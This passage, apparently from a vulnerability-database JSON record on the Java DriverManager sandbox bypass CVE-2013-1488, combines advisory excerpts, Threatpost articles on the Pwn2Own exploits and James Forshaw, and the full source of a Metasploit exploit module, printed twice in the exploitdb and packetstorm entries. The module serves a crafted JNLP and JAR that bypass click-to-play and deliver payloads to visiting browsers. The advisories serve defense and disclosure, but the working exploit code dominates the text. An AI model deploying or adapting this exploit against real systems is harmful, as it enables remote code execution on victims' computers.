should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Set web browser security to disable the execution of script code or active content.** \nDisabling the execution of script code in the browser may limit exposure to this and other latent vulnerabilities.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo limit the impact of latent vulnerabilities, configure applications to run as a nonadministrative user with minimal access rights.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2013-03-07T00:00:00", "published": "2013-03-07T00:00:00", "id": "SMNTC-58504", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/58504", "type": "symantec", "title": "Oracle Java SE CVE-2013-1488 Remote Code Execution Vulnerability", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T23:00:53", "bulletinFamily": "info", "description": "Details have been disclosed about [vulnerabilities exploited in Chrome and Java during the Pwn2Own contest](<http://threatpost.com/firefox-java-flash-all-taken-down-pwn2own-030713/>). Google made [patches available for the Chrome](<http://threatpost.com/mozilla-and-google-patch-browser-flaws-used-pwn2own-030813/>) flaw within 24 hours, while Oracle patched Java fully last week.\n\nDetails were not disclosed by the researchers, who netted tens of thousands for their exploits, until last Friday, more than a month after the contest.\n\nThe exploits in question here used a variety of techniques to break both the popular browser and the browser plug-in. Java has had a particularly miserable year in terms of security, starting shortly after Christmas with a number of zero-day exploits used high profile targeted attacks. Chrome, meanwhile, remains a difficult challenge for researchers and hackers alike. Not only is it a popular target during Pwn2Own, but Google runs a concurrent Pwnium event during the CanSecWest Conference challenging researchers to take a crack at the browser.\n\nMWR Labs researchers were able to take down an up-to-date version of Chrome running on a fully patched Windows computer during the contest. Not only did they find and exploit a previously unknown flaw in Chrome, but were able to chain that together with a [kernel exploit targeting Windows](<http://threatpost.com/using-kernel-exploits-bypass-sandboxes-fun-and-profit-031813/>) to elevate privileges and own the browser.\n\nMeanwhile, James Forshaw, of Context Information Security of London, was able to break Java with an exploit for CVE-2013-1488, a vulnerability in the java.sql.DriverManager class, a trusted part of the Java framework, he wrote in a [blogpost](<http://www.contextis.co.uk/research/blog/java-pwn2own/>) on Friday. This part of Java, he said, is used to access relational databases.\n\n\u201cWithin the source code for this class, a Java vulnerability hunter would be drawn to the two AccessController.doPrivileged blocks like a moth to a flame,\u201d he said. \u201cThey allow the Java libraries to temporarily elevate its privileges to perform a security critical action.\u201d\n\n[Oracle released Java 7u21](<http://threatpost.com/oracle-patches-42-java-flaws-adds-new-code-signing-restrictions-and-warnings/>) last week with security patches that repaired all of the vulnerabilities exploited at Pwn2Own. Forshaw\u2019s exploit enabled a sandbox bypass by repurposing unrelated code to ultimately disable the security manager and run malicious code as trusted. He said Oracle does not rate this flaw as critical because of the work involved, but a determined, persistent attacker could find success.\n\n\u201cThat is also why I think something like Java can never be secured against hostile code running within a sandboxed environment,\u201d Forshaw said. \u201cThe attacker has too much control to craft the environment to exploit the tiniest of weaknesses. The large amount of trusted code bundled with the JRE just acts to amplify that power.\u201d\n\nMWR Labs researchers, in turn, had to get equally creative to exploit the vulnerabilities in Chrome and beat the browser\u2019s sandbox, as well as Chrome\u2019s use of address space randomization layout (ASLR). The exploit targeted a WebKit vulnerability, which was the browser\u2019s rendering engine, as well as a kernel overflow vulnerability in Windows, the underlying operating system.\n\nThe WebKit bug occurred in the way it handled viewing targets in Scalable Vector Graphics documents. SVG files support animation and interactive features on websites. MWR said in a [blogpost](<http://labs.mwrinfosecurity.com/blog/2013/04/19/mwr-labs-pwn2own-2013-write-up---webkit-exploit/>) it was able to specify a viewTarget for an SVG document and embed non-SVG elements inside a document.\n\n\u201cThis vulnerability was extremely flexible as we were able to cast an element into almost any SVG element type,\u201d MWR Labs said. \u201cWe did this by creating an HTML element with the tag name set as a valid SVG tag.\u201d The tag name is invalid, the researchers said, but after the cast, the unknown element is recognized as valid and the properties and methods of the SVG document can be accessed from JavaScript and access the adjacent memory. This allowed MWR to read adjacent memory, control it and not risk crashing the browser.\n\n\u201cIt is very difficult to secure such a complex piece of software, which frequently deals with untrusted input,\u201d MWR said. \u201cEven with modern exploit mitigation techniques and the inclusion of a sandboxed renderer processes, these protection mechanisms can be circumvented by exploiting the underlying operating system.\u201d\n", "modified": "2013-04-23T16:54:56", "published": "2013-04-22T15:33:07", "id": "THREATPOST:92F8A3F31577F6D3E7142B4AEA6BB5FE", "href": "https://threatpost.com/chrome-and-java-pwn2own-vulnerabilities-explained/99835/", "type": "threatpost", "title": "Details Available for Chrome, Java Pwn2Own Flaws", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:59", "bulletinFamily": "info", "description": "Give James Forshaw a good logic bug over a memory-corruption vulnerability any day of the week.\n\nThe British researcher says he would rather manipulate weaknesses in code to climb out of an application sandbox than turn a fuzzer against a piece of software and spot a memory leak. But incentivized by Microsoft\u2019s recent announcement that it was offering serious money for novel mitigation-bypass techniques, the temptation was too great for Forshaw to pass up.\n\nThe payoff came on Tuesday when after six weeks of research and tweaking exploit code, [Forshaw was awarded $100,000 for as-of-yet unnamed bypass of Windows memory protections](<http://threatpost.com/researcher-takes-home-100k-prize-from-microsoft-for-new-attack/102548>). The majority of the money, along with a similar $9,400 [Internet Explorer bounty](<https://threatpost.com/researchers-nab-28k-in-microsoft-bug-bounty-program/102535>) paid out on Monday, will go to Forshaw\u2019s employee Context Information Security of London to fund the security research team there.\n\n\u201c[Microsoft] has pretty much banned me from specifying any detail,\u201d Forshaw said. \u201cWhat I can share is that it\u2019s a bypass for a number of platform mitigations that allows you to get code execution without troubling DEP or ASLR.\u201d\n\nData Execution Prevention and Address Space Layout Randomization are exploit mitigations native to Windows, and other operating systems, that are supposed to prevent code from executing in areas of memory where it should not. Numerous exploits, including a recent Internet Explorer zero day, have been able to defeat or sidestep both mitigations, but that doesn\u2019t mean it\u2019s not a challenge to researchers and hackers alike.\n\n\u201cSo I have written exploits that go after these sorts of technologies in the past; there are different ways of defeating ASLR and DEP to get information leaks or get DLLs to work that are not ASLR-enabled (such as the IE zero day managed),\u201d Forshaw said. \u201cBut I\u2019m more of a logic bug finder than memory corruption.\u201d\n\nEarlier this year at Pwn2Own, Forshaw cashed in with a [Java exploit for a vulnerability in a trusted class in the Java framework](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1488>) that allowed him to [bypass the sandbox and execute code remotely](<http://threatpost.com/chrome-and-java-pwn2own-vulnerabilities-explained/99835>). That Java bug was patched in April with the release of Java 7u21 and the researcher explained in a [blogpost](<http://www.contextis.co.uk/research/blog/java-pwn2own/>) shortly thereafter that his code allowed him to disable the security manager in Java and run malicious code as trusted.\n\nMicrosoft engineer Thomas Garnier also found a similar attack as the one submitted by Forshaw, but Microsoft senior security strategist Katie Moussouris said Forshaw\u2019s entry was worthy of a full payout, the first since the bounty was announced.\n\n\u201cMicrosoft engineers like Thomas are constantly evaluating ways to improve security, but James\u2019 submission was of such high quality and outlined some other variants such that we wanted to award him the full $100,000 bounty,\u201d Moussouris said.\n\nForshaw said he spent three weeks doing research related to his bypass.\n\n\u201cOnce I came up with something I felt was viable, I submitted it and learned two weeks ago Microsoft had accepted the entry,\u201d Forshaw said. \u201cI think I was sort of about 50 percent it was going to be accepted. There were a few things which it wasn\u2019t clear from the rules whether it would meet their bar. There are seven criteria to meet, and I felt met them all, but it was a bit of a tense time.\u201d\n\nAccording to Microsoft, [bypass submissions](<https://www.microsoft.com/security/msrc/report/bypass_bounty.aspx>) must demonstrate a novel way of exploiting a remote code execution vulnerability in Windows and must be capable of exploiting an application that makes use of stack- and heap-corruption mitigations as well as code-execution mitigations. The bypass must also meet seven criteria: it must be generic in that it\u2019s applicable to more than one memory corruption vulnerability; the exploit must be reliable and have reasonable requirements; it must be applicable to a high-risk application such as a browser or document reader; it must be applicable to user mode applications; it must also target the latest version of a Microsoft product; and it must be novel, Microsoft said.\n\n\u201cIt was the aspect of novelty I was worried about,\u201d Forshaw said. \u201cI couldn\u2019t say for certain no one had ever used it before. I did my due diligence on my technique to see whether it had been published or used in anger before. I couldn\u2019t find anything.\u201d\n\nWhile winning more than $100,000 this week may keep the accountants at Context smiling, Forshaw also took satisfaction in knowing he was on a similar track as a Microsoft engineer intimate with Windows code.\n\n\u201cThere are quite clever people at Microsoft actively looking at these things. Beating them is quite a challenge,\u201d Forshaw said, adding he much prefers these types of defensive-oriented competitions. \u201cI think it\u2019s certainly an interesting approach to take, focusing more on the defensive than offensive side. Only Microsoft is in position to do that; Google might be able to as well with the Chrome OS. Microsoft is wise to choose this approach versus an all-out free-for-all to find bugs.\u201d\n\n[_Image courtesy Nick Ares_](<http://www.flickr.com/photos/aresauburnphotos/>)\n", "modified": "2013-10-11T13:53:34", "published": "2013-10-10T13:12:31", "id": "THREATPOST:247A5639B207C2C522F735B0C3412087", "href": "https://threatpost.com/microsoft-bounty-winner-finds-payoff-outside-comfort-zone/102559/", "type": "threatpost", "title": "Microsoft Mitigation Bypass Bounty Winner James Forshaw", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdi": [{"lastseen": "2016-11-09T00:17:56", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Oracle Java. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the usage of java.sql.DriverManager. The issue lies in an implicit call to toString() that is made within a doPrivileged block. An attacker can leverage this vulnerability to execute code under the context of the current process.", "modified": "2013-11-09T00:00:00", "published": "2013-05-10T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-13-076", "id": "ZDI-13-076", "title": "(Pwn2Own) Oracle Java DriverManager Privilege Block Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2019-06-04T23:19:38", "bulletinFamily": "exploit", "description": "Added: 05/24/2013 \nCVE: [CVE-2013-1488](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1488>) \nBID: [58504](<http://www.securityfocus.com/bid/58504>) \nOSVDB: [91472](<http://www.osvdb.org/91472>) \n\n\n### Background\n\nOracle Java is a development platform for developing and deploying Java applications. It includes the Java Development Kit (JDK) and the Java Runtime Environment (JRE). The JRE provides the minimum requirements for executing a Java application (e.g., an applet) and consists of the Java Virtual Machine (JVM), core classes and supporting files. \n\n### Problem\n\nA vulnerability in the `**java.sql.DriverManager**` class allows arbitrary command execution outside the security sandbox due to an implicit call to the `**toString()**` function that is made within a doPrivileged block. \n\n### Resolution\n\n[Upgrade](<http://www.oracle.com/technetwork/java/javase/downloads/index.html>) to the current version of Java SE. \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-13-076/> \n<http://www.oracle.com/technetwork/topics/security/javacpuapr2013-1928497.html> \n\n\n### Limitations\n\nExploit works on JRE 7 Update 17 on Windows XP SP3 (DEP OptIn), Windows 7 SP1 (DEP OptIn), and Ubuntu 12.10, and requires the user to open the exploit page in Internet Explorer on Windows or Firefox on Linux. \n\n### Platforms\n\nWindows \nLinux \n \n\n", "modified": "2013-05-24T00:00:00", "published": "2013-05-24T00:00:00", "id": "SAINT:420F87A117CB5F2241DF187A7990D7CF", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/jre_drivermanager_doprivileged_tostring", "title": "Java Runtime Environment DriverManager doPrivileged block sandbox bypass", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:02:01", "bulletinFamily": "exploit", "description": "Added: 05/24/2013 \nCVE: [CVE-2013-1488](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1488>) \nBID: [58504](<http://www.securityfocus.com/bid/58504>) \nOSVDB: [91472](<http://www.osvdb.org/91472>) \n\n\n### Background\n\nOracle Java is a development platform for developing and deploying Java applications. It includes the Java Development Kit (JDK) and the Java Runtime Environment (JRE). The JRE provides the minimum requirements for executing a Java application (e.g., an applet) and consists of the Java Virtual Machine (JVM), core classes and supporting files. \n\n### Problem\n\nA vulnerability in the `**java.sql.DriverManager**` class allows arbitrary command execution outside the security sandbox due to an implicit call to the `**toString()**` function that is made within a doPrivileged block. \n\n### Resolution\n\n[Upgrade](<http://www.oracle.com/technetwork/java/javase/downloads/index.html>) to the current version of Java SE. \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-13-076/> \n<http://www.oracle.com/technetwork/topics/security/javacpuapr2013-1928497.html> \n\n\n### Limitations\n\nExploit works on JRE 7 Update 17 on Windows XP SP3 (DEP OptIn), Windows 7 SP1 (DEP OptIn), and Ubuntu 12.10, and requires the user to open the exploit page in Internet Explorer on Windows or Firefox on Linux. \n\n### Platforms\n\nWindows \nLinux \n \n\n", "modified": "2013-05-24T00:00:00", "published": "2013-05-24T00:00:00", "id": "SAINT:116AF8634B5A70832986245A74722785", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/jre_drivermanager_doprivileged_tostring", "type": "saint", "title": "Java Runtime Environment DriverManager doPrivileged block sandbox bypass", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T19:19:23", "bulletinFamily": "exploit", "description": "Added: 05/24/2013 \nCVE: [CVE-2013-1488](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1488>) \nBID: [58504](<http://www.securityfocus.com/bid/58504>) \nOSVDB: [91472](<http://www.osvdb.org/91472>) \n\n\n### Background\n\nOracle Java is a development platform for developing and deploying Java applications. It includes the Java Development Kit (JDK) and the Java Runtime Environment (JRE). The JRE provides the minimum requirements for executing a Java application (e.g., an applet) and consists of the Java Virtual Machine (JVM), core classes and supporting files. \n\n### Problem\n\nA vulnerability in the `**java.sql.DriverManager**` class allows arbitrary command execution outside the security sandbox due to an implicit call to the `**toString()**` function that is made within a doPrivileged block. \n\n### Resolution\n\n[Upgrade](<http://www.oracle.com/technetwork/java/javase/downloads/index.html>) to the current version of Java SE. \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-13-076/> \n<http://www.oracle.com/technetwork/topics/security/javacpuapr2013-1928497.html> \n\n\n### Limitations\n\nExploit works on JRE 7 Update 17 on Windows XP SP3 (DEP OptIn), Windows 7 SP1 (DEP OptIn), and Ubuntu 12.10, and requires the user to open the exploit page in Internet Explorer on Windows or Firefox on Linux. \n\n### Platforms\n\nWindows \nLinux \n \n\n", "modified": "2013-05-24T00:00:00", "published": "2013-05-24T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/jre_drivermanager_doprivileged_tostring", "id": "SAINT:AEAAB8FB1BD480E4A2D604850A3646A6", "type": "saint", "title": "Java Runtime Environment DriverManager doPrivileged block sandbox bypass", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-03T02:55:25", "bulletinFamily": "exploit", "description": "Java Applet Driver Manager Privileged toString() Remote Code Execution. CVE-2013-1488. Remote exploits for multiple platform", "modified": "2013-06-11T00:00:00", "published": "2013-06-11T00:00:00", "id": "EDB-ID:26135", "href": "https://www.exploit-db.com/exploits/26135/", "type": "exploitdb", "title": "Java Applet Driver Manager Privileged toString Remote Code Execution", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'rex'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::EXE\r\n\r\n include Msf::Exploit::Remote::BrowserAutopwn\r\n autopwn_info({ :javascript => false })\r\n\r\n def initialize( info = {} )\r\n\r\n super( update_info( info,\r\n 'Name' => 'Java Applet Driver Manager Privileged toString() Remote Code Execution',\r\n 'Description' => %q{\r\n This module abuses the java.sql.DriverManager class where the toString() method\r\n is called over user supplied classes, from a doPrivileged block. The vulnerability\r\n affects Java version 7u17 and earlier. This exploit bypasses click-to-play on IE\r\n throw a specially crafted JNLP file. This bypass is applied mainly to IE, when Java\r\n Web Start can be launched automatically throw the ActiveX control. Otherwise the\r\n applet is launched without click-to-play bypass.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'James Forshaw', # Vulnerability discovery and Analysis\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-1488' ],\r\n [ 'OSVDB', '91472' ],\r\n [ 'BID', '58504' ],\r\n [ 'URL', 'http://www.contextis.com/research/blog/java-pwn2own/' ],\r\n [ 'URL', 'http://immunityproducts.blogspot.com/2013/04/yet-another-java-security-warning-bypass.html' ],\r\n [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-076/' ]\r\n ],\r\n 'Platform' => [ 'java', 'win', 'osx', 'linux' ],\r\n 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },\r\n 'Targets' =>\r\n [\r\n [ 'Generic (Java Payload)',\r\n {\r\n 'Platform' => ['java'],\r\n 'Arch' => ARCH_JAVA,\r\n }\r\n ],\r\n [ 'Windows x86 (Native Payload)',\r\n {\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X86,\r\n }\r\n ],\r\n [ 'Mac OS X x86 (Native Payload)',\r\n {\r\n 'Platform' => 'osx',\r\n 'Arch' => ARCH_X86,\r\n }\r\n ],\r\n [ 'Linux x86 (Native Payload)',\r\n {\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_X86,\r\n }\r\n ],\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Jan 10 2013'\r\n ))\r\n end\r\n\r\n\r\n def setup\r\n path = File.join(Msf::Config.install_root, \"data\", \"exploits\", \"cve-2013-1488\", \"Exploit.class\")\r\n @exploit_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\r\n path = File.join(Msf::Config.install_root, \"data\", \"exploits\", \"cve-2013-1488\", \"FakeDriver.class\")\r\n @driver_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\r\n path = File.join(Msf::Config.install_root, \"data\", \"exploits\", \"cve-2013-1488\", \"FakeDriver2.class\")\r\n @driver2_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\r\n path = File.join(Msf::Config.install_root, \"data\", \"exploits\", \"cve-2013-1488\", \"META-INF\", \"services\", \"java.lang.Object\")\r\n @object_services = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\r\n path = File.join(Msf::Config.install_root, \"data\", \"exploits\", \"cve-2013-1488\", \"META-INF\", \"services\", \"java.sql.Driver\")\r\n @driver_services = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\r\n\r\n @exploit_class_name = rand_text_alpha(\"Exploit\".length)\r\n @exploit_class.gsub!(\"Exploit\", @exploit_class_name)\r\n\r\n @jnlp_name = rand_text_alpha(8)\r\n\r\n super\r\n end\r\n\r\n def jnlp_file\r\n jnlp_uri = \"#{get_uri}/#{@jnlp_name}.jnlp\"\r\n\r\n jnlp = %Q|\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<jnlp spec=\"1.0\" xmlns:jfx=\"http://javafx.com\" href=\"#{jnlp_uri}\">\r\n <information>\r\n <title>Applet Test JNLP</title>\r\n <vendor>#{rand_text_alpha(8)}</vendor>\r\n <description>#{rand_text_alpha(8)}</description>\r\n <offline-allowed/>\r\n </information>\r\n\r\n <resources>\r\n <j2se version=\"1.7+\" href=\"http://java.sun.com/products/autodl/j2se\" />\r\n <jar href=\"#{rand_text_alpha(8)}.jar\" main=\"true\" />\r\n </resources>\r\n <applet-desc name=\"#{rand_text_alpha(8)}\" main-class=\"#{@exploit_class_name}\" width=\"1\" height=\"1\">\r\n <param name=\"__applet_ssv_validated\" value=\"true\"></param>\r\n </applet-desc>\r\n <update check=\"background\"/>\r\n</jnlp>\r\n |\r\n return jnlp\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n print_status(\"handling request for #{request.uri}\")\r\n\r\n case request.uri\r\n when /\\.jnlp$/i\r\n send_response(cli, jnlp_file, { 'Content-Type' => \"application/x-java-jnlp-file\" })\r\n when /\\.jar$/i\r\n jar = payload.encoded_jar\r\n jar.add_file(\"#{@exploit_class_name}.class\", @exploit_class)\r\n jar.add_file(\"FakeDriver.class\", @driver_class)\r\n jar.add_file(\"FakeDriver2.class\", @driver2_class)\r\n jar.add_file(\"META-INF/services/java.lang.Object\", @object_services)\r\n jar.add_file(\"META-INF/services/java.sql.Driver\", @driver_services)\r\n metasploit_str = rand_text_alpha(\"metasploit\".length)\r\n payload_str = rand_text_alpha(\"payload\".length)\r\n jar.entries.each { |entry|\r\n entry.name.gsub!(\"metasploit\", metasploit_str)\r\n entry.name.gsub!(\"Payload\", payload_str)\r\n entry.data = entry.data.gsub(\"metasploit\", metasploit_str)\r\n entry.data = entry.data.gsub(\"Payload\", payload_str)\r\n }\r\n jar.build_manifest\r\n\r\n send_response(cli, jar, { 'Content-Type' => \"application/octet-stream\" })\r\n when /\\/$/\r\n payload = regenerate_payload(cli)\r\n if not payload\r\n print_error(\"Failed to generate the payload.\")\r\n send_not_found(cli)\r\n return\r\n end\r\n send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })\r\n else\r\n send_redirect(cli, get_resource() + '/', '')\r\n end\r\n\r\n end\r\n\r\n def generate_html\r\n jnlp_uri = \"#{get_uri}/#{@jnlp_name}.jnlp\"\r\n\r\n # When the browser is IE, the ActvX is used in order to load the malicious JNLP, allowing click2play bypass\r\n # Else an <applet> tag is used to load the malicious applet, this time there isn't click2play bypass\r\n html = %Q|\r\n <html>\r\n <body>\r\n <object codebase=\"http://java.sun.com/update/1.6.0/jinstall-6-windows-i586.cab#Version=6,0,0,0\" classid=\"clsid:5852F5ED-8BF4-11D4-A245-0080C6F74284\" height=0 width=0>\r\n <param name=\"app\" value=\"#{jnlp_uri}\">\r\n <param name=\"back\" value=\"true\">\r\n <applet archive=\"#{rand_text_alpha(8)}.jar\" code=\"#{@exploit_class_name}.class\" width=\"1\" height=\"1\"></applet>\r\n </object>\r\n </body>\r\n </html>\r\n |\r\n return html\r\n end\r\n\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/26135/"}], "packetstorm": [{"lastseen": "2016-12-05T22:13:42", "bulletinFamily": "exploit", "description": "", "modified": "2013-06-10T00:00:00", "published": "2013-06-10T00:00:00", "href": "https://packetstormsecurity.com/files/121956/Java-Applet-Driver-Manager-Privileged-toString-Remote-Code-Execution.html", "id": "PACKETSTORM:121956", "type": "packetstorm", "title": "Java Applet Driver Manager Privileged toString() Remote Code Execution", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \nrequire 'rex' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::EXE \n \ninclude Msf::Exploit::Remote::BrowserAutopwn \nautopwn_info({ :javascript => false }) \n \ndef initialize( info = {} ) \n \nsuper( update_info( info, \n'Name' => 'Java Applet Driver Manager Privileged toString() Remote Code Execution', \n'Description' => %q{ \nThis module abuses the java.sql.DriverManager class where the toString() method \nis called over user supplied classes, from a doPrivileged block. The vulnerability \naffects Java version 7u17 and earlier. This exploit bypasses click-to-play on IE \nthrow a specially crafted JNLP file. This bypass is applied mainly to IE, when Java \nWeb Start can be launched automatically throw the ActiveX control. Otherwise the \napplet is launched without click-to-play bypass. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'James Forshaw', # Vulnerability discovery and Analysis \n'juan vazquez' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2013-1488' ], \n[ 'OSVDB', '91472' ], \n[ 'BID', '58504' ], \n[ 'URL', 'http://www.contextis.com/research/blog/java-pwn2own/' ], \n[ 'URL', 'http://immunityproducts.blogspot.com/2013/04/yet-another-java-security-warning-bypass.html' ], \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-076/' ] \n], \n'Platform' => [ 'java', 'win', 'osx', 'linux' ], \n'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, \n'Targets' => \n[ \n[ 'Generic (Java Payload)', \n{ \n'Platform' => ['java'], \n'Arch' => ARCH_JAVA, \n} \n], \n[ 'Windows x86 (Native Payload)', \n{ \n'Platform' => 'win', \n'Arch' => ARCH_X86, \n} \n], \n[ 'Mac OS X x86 (Native Payload)', \n{ \n'Platform' => 'osx', \n'Arch' => ARCH_X86, \n} \n], \n[ 'Linux x86 (Native Payload)', \n{ \n'Platform' => 'linux', \n'Arch' => ARCH_X86, \n} \n], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Jan 10 2013' \n)) \nend \n \n \ndef setup \npath = File.join(Msf::Config.install_root, \"data\", \"exploits\", \"cve-2013-1488\", \"Exploit.class\") \n@exploit_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) } \npath = File.join(Msf::Config.install_root, \"data\", \"exploits\", \"cve-2013-1488\", \"FakeDriver.class\") \n@driver_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) } \npath = File.join(Msf::Config.install_root, \"data\", \"exploits\", \"cve-2013-1488\", \"FakeDriver2.class\") \n@driver2_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) } \npath = File.join(Msf::Config.install_root, \"data\", \"exploits\", \"cve-2013-1488\", \"META-INF\", \"services\", \"java.lang.Object\") \n@object_services = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) } \npath = File.join(Msf::Config.install_root, \"data\", \"exploits\", \"cve-2013-1488\", \"META-INF\", \"services\", \"java.sql.Driver\") \n@driver_services = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) } \n \n@exploit_class_name = rand_text_alpha(\"Exploit\".length) \n@exploit_class.gsub!(\"Exploit\", @exploit_class_name) \n \n@jnlp_name = rand_text_alpha(8) \n \nsuper \nend \n \ndef jnlp_file \njnlp_uri = \"#{get_uri}/#{@jnlp_name}.jnlp\" \n \njnlp = %Q| \n<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<jnlp spec=\"1.0\" xmlns:jfx=\"http://javafx.com\" href=\"#{jnlp_uri}\"> \n<information> \n<title>Applet Test JNLP</title> \n<vendor>#{rand_text_alpha(8)}</vendor> \n<description>#{rand_text_alpha(8)}</description> \n<offline-allowed/> \n</information> \n \n<resources> \n<j2se version=\"1.7+\" href=\"http://java.sun.com/products/autodl/j2se\" /> \n<jar href=\"#{rand_text_alpha(8)}.jar\" main=\"true\" /> \n</resources> \n<applet-desc name=\"#{rand_text_alpha(8)}\" main-class=\"#{@exploit_class_name}\" width=\"1\" height=\"1\"> \n<param name=\"__applet_ssv_validated\" value=\"true\"></param> \n</applet-desc> \n<update check=\"background\"/> \n</jnlp> \n| \nreturn jnlp \nend \n \ndef on_request_uri(cli, request) \nprint_status(\"handling request for #{request.uri}\") \n \ncase request.uri \nwhen /\\.jnlp$/i \nsend_response(cli, jnlp_file, { 'Content-Type' => \"application/x-java-jnlp-file\" }) \nwhen /\\.jar$/i \njar = payload.encoded_jar \njar.add_file(\"#{@exploit_class_name}.class\", @exploit_class) \njar.add_file(\"FakeDriver.class\", @driver_class) \njar.add_file(\"FakeDriver2.class\", @driver2_class) \njar.add_file(\"META-INF/services/java.lang.Object\", @object_services) \njar.add_file(\"META-INF/services/java.sql.Driver\", @driver_services) \nmetasploit_str = rand_text_alpha(\"metasploit\".length) \npayload_str = rand_text_alpha(\"payload\".length) \njar.entries.each { |entry| \nentry.name.gsub!(\"metasploit\", metasploit_str) \nentry.name.gsub!(\"Payload\", payload_str) \nentry.data = entry.data.gsub(\"metasploit\", metasploit_str) \nentry.data = entry.data.gsub(\"Payload\", payload_str) \n} \njar.build_manifest \n \nsend_response(cli, jar, { 'Content-Type' => \"application/octet-stream\" }) \nwhen /\\/$/ \npayload = regenerate_payload(cli) \nif not payload \nprint_error(\"Failed to generate the payload.\") \nsend_not_found(cli) \nreturn \nend \nsend_response_html(cli, generate_html, { 'Content-Type' => 'text/html' }) \nelse \nsend_redirect(cli, get_resource() + '/', '') \nend \n \nend \n \ndef generate_html \njnlp_uri = \"#{get_uri}/#{@jnlp_name}.jnlp\" \n \n# When the browser is IE, the ActvX is used in order to load the malicious JNLP, allowing click2play bypass \n# Else an <applet> tag is used to load the malicious applet, this time there isn't click2play bypass \nhtml = %Q| \n<html> \n<body> \n<object codebase=\"http://java.sun.com/update/1.6.0/jinstall-6-windows-i586.cab#Version=6,0,0,0\" classid=\"clsid:5852F5ED-8BF4-11D4-A245-0080C6F74284\" height=0 width=0> \n<param name=\"app\" value=\"#{jnlp_uri}\"> \n<param name=\"back\" value=\"true\"> \n<applet archive=\"#{rand_text_alpha(8)}.jar\" code=\"#{@exploit_class_name}.class\" 